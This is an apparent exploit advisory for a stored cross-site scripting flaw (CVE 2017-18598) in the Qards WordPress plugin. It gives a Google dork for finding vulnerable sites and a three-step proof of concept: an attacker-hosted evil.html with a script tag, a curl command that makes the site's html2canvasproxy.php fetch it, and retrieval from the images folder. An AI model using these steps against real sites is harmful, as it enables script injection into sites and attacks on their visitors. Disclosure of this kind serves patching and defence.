Qards – Stored Cross-Site Scripting (XSS) | CVE 2017-18598

Description

Google Dork: inurl:"plugins/qards"

Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.

Proof of Concept

The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
get the value of the "url" parameter and, using CURL PHP functions, saves the website's content to a file at /wp-content/plugins/qards/images/ with a filename formatted as following:

<hash md5>.<mime-type>

On a web server with "Directory Listing" enabled, you could easily find that file.
Due to improper sanitization, the generated file, suffer from a persistent XSS vulnerability.

POC:
1. create a remote file (evil.html), on your webserver, with the following content:

<script> alert('XSS'); </script>

2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'

3. Browse to http://target/wp-content/plugins/qards/images/ to get the file